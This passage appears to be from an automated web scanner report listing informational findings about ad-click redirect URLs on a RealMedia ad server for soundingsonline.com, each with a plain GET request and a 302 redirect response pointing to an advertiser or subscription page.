GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1297608231/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.182. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301220819/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301220819/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301220819/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301220819/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.183. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301733136/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301733136/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301733136/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1301733136/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.184. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.185. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1307341270/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1307341270/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1307341270/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1307341270/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.186. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1316138159/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1316138159/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1316138159/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1316138159/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:47 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.187. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/131754643/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/131754643/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/131754643/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/131754643/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.188. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1321743323/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1321743323/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1321743323/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.flashedition.com/publication?i=59172

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1321743323/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.flashedition.com/publication?i=59172
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.flashedition.com/publication?i=59172">here</a>
...[SNIP]...

20.189. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1322681688/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1322681688/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1322681688/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1322681688/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.190. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:07:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 300
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.191. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325718108/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325718108/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325718108/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325718108/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.192. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/132686392/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/132686392/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/132686392/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/132686392/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.193. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1328230363/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1328230363/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1328230363/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1328230363/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.194. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1341609875/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1341609875/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1341609875/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1341609875/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.195. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1348531661/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1348531661/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1348531661/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1348531661/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:49 GMT
Server: Apache/2.2.3 (Red Hat)
